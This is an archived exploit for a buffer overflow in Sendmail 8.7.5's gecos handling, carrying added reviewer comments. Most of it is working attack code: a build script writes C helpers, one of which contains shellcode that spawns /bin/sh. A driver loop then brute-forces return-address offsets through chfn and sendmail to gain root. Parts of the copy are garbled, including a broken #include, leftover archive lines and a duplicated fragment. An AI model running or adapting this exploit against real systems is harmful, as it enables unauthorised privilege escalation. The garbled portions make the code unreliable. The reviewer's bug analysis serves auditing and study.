+++++ *NIX Sendmail (8.7.5) - Buffer Overflow - Newest sendmail exploit :
# NOTE(review): the line above is a catalogue heading from the collection this
# copy was taken from, not part of the script (as a shell line it is a syntax
# error because of the parentheses). It is kept only because this copy arrived
# as one collapsed line.
#
# Hrm... and Eric Allman told me to my face that there were *no* buffer
# overflows in 8.7.5 -- .mudge
# This works on systems that have the chpass program runnable by
# users. Tested on FreeBSD, though the vulnerability exists in all
# Sendmail 8.7.5. Granted you need to be able to change your gecos field ;-)
#
# The problem is in buildfnam() which lives in util.c - it treats
# the static allocated array nbuf[MAXSIZE+1], from recipient.c, in
# an unbounded fashion.
#
# mudge@l0pht.com
#
# Reviewer's summary, for readers auditing rather than running this: the bug
# class is an unbounded copy into a fixed-size static buffer (nbuf) fed from a
# field (gecos) that an unprivileged local user may set through the setuid
# chpass/chfn tools. The defence belongs on the sendmail side: copy the
# gecos-derived name into nbuf with an explicit bound and reject or truncate
# input longer than the buffer, instead of trusting a field any local user
# controls. Everything below is a shar-style build script: it writes two C
# helper programs with here-documents, compiles them, and prints manual steps.

CC=/usr/bin/gcc
RM=/bin/rm

# a_run.c: prints one replacement "Full Name:" line to stdout. Its single
# argument is a decimal offset that is added to the base value 0xefbfcea8.
# Output is "Full Name: CCCCCCCCCC", then 60 x "AAAA" (odd offset) or
# 60 x "BBBB" (even offset), then the resulting 4-byte value written five
# times with its bytes emitted in 2,3,0,1 order rather than memory order.
# `foo` and `j` are declared but never used. No headers are included; printf,
# exit and atoi are implicitly declared, which only pre-C99 (or lenient)
# compilers accept.
cat > a_run.c << EOF
main(int argc, char *argv[])
{
    long addr=0xefbfcea8;
    char *ptr = (char *)&addr;
    char foo[5];
    int i, j;

    if (argc != 2){
        printf("Usage: %s offset\n", argv[0]);
        exit(1);
    }
    addr += atoi(argv[1]);
    printf("Full Name: CCCCCCCCCC");
    if (atoi(argv[1])%2){
        for(i=0; i<60; i++)
            printf("AAAA");
    }
    else{
        for(i=0; i<60; i++)
            printf("BBBB");
    }
    for (i = 0; i< 5; i++){
        printf("%c%c%c%c", *(ptr+2), *(ptr+3), *(ptr), *(ptr+1));
    }
}
EOF

# make_gecos.c: prints 40 bytes of 0x90 followed by the bytes of mach_codes,
# which ends in "/bin/sh". NOTE(review): the first two lines of this
# here-document are garbled in this copy -- a stray "~" and a "#include" that
# has lost its header name (most likely stripped as markup). As written the
# file does not compile, so this copy cannot be taken as authoritative.
cat > make_gecos.c << EOF
~
#include
main(int argc, char *argv[])
{
    int i;
    char mach_codes[] =
        "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
        "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
        "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
        "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

    for (i=0; i<40; i++)
        printf("%c", 0x90);
    printf("%s", mach_codes);
}
EOF

# Build both helpers. The failure messages say "make_asdf" / "asdf" but refer
# to make_gecos and a.out respectively; the checks test for an executable
# output rather than the compiler's exit status.
$CC -o make_gecos make_gecos.c
if [ ! -x make_gecos ] ; then
    echo failed to build make_asdf
    exit 1
fi
$CC a_run.c
if [ ! -x a.out ] ; then
    echo failed to build asdf
    exit 1
fi
# Remove the sources, leaving only the two binaries.
$RM a_run.c make_gecos.c

# The remaining lines print the manual steps for the operator.
echo "1 - Change the variables in the sploit.sh script"
echo "2 - run make_gecos > tmpr"
echo "3 - setenv MANPATH=\"\`cat ./tmpr\`\" "
echo "4 - run the sploit.sh sploit.sh script with an argument"
echo " of around 3000"
# this argument varies depending upon what lives in one's
# environment variables, what the paths are, etc. etc.
# on a pretty stock environment in a FreeBSD setup I hit
# around 3900
#
# NOTE(review): the next line is not a command. It looks like a file-table
# entry (name, mode, uid, gid, size, ...) left over from the archive this copy
# came from; the second script, sploit.sh, starts at the "#!/bin/sh" below.
sploit.sh 600 0 3 704 6213376125 5634
#!/bin/sh
# sploit.sh: driver loop. Takes an optional starting offset, then for every
# offset from there up to 16048: regenerates the "Full Name:" line with
# ./a.out into $FILE, runs chfn for "username" with ex as the editor and feeds
# it three commands (delete line 3, read ./ouch in after line 2, write and
# quit), syncs twice, echoes the offset, and runs /usr/sbin/sendmail with
# "username" as its argument.
#
# Reviewer notes: TMP is assigned but never used. FILE is an absolute path
# while the ex command reads the relative ./ouch, so the two only name the
# same file when the script is run from that directory. The backtick form of
# the while test works because a command that expands to no words takes the
# exit status of its command substitution, but `while [ $i -le 16048 ]` is
# the conventional spelling. Two alternative generators (./m3, ./make_gecos)
# are left commented out inside the loop.
if [ $# = 1 ] ; then
    i=$1
else
    i=0
fi
FILE=/usr/home/username/wip/overflow/sendmail/ouch
TMP=/usr/home/username/wip/overflow/sendmail/cleanup
EDITOR=/usr/bin/ex
export EDITOR
while `[ $i -le 16048 ]`
do
    # ./m3 ${i} > $FILE
    # ./make_gecos ${i} > $FILE
    ./a.out ${i} > $FILE
    chfn username << FOE
3 d
2 r ./ouch
wq!
FOE
    sync
    sync
    echo "using arg of [0xefbfcea8 (hex) + ${i}(dec)]"
    /usr/sbin/sendmail username
    i=`expr $i + 1`
done
# NOTE(review): the line below ("in" followed by a repeat of the header
# comment) is a duplicated fragment left by extraction, not part of sploit.sh;
# "in" is only a stray token here.
in # an unbounded fashion. # # mudge@l0pht.com CC=/usr/bin/ -- duplicated header fragment, see note above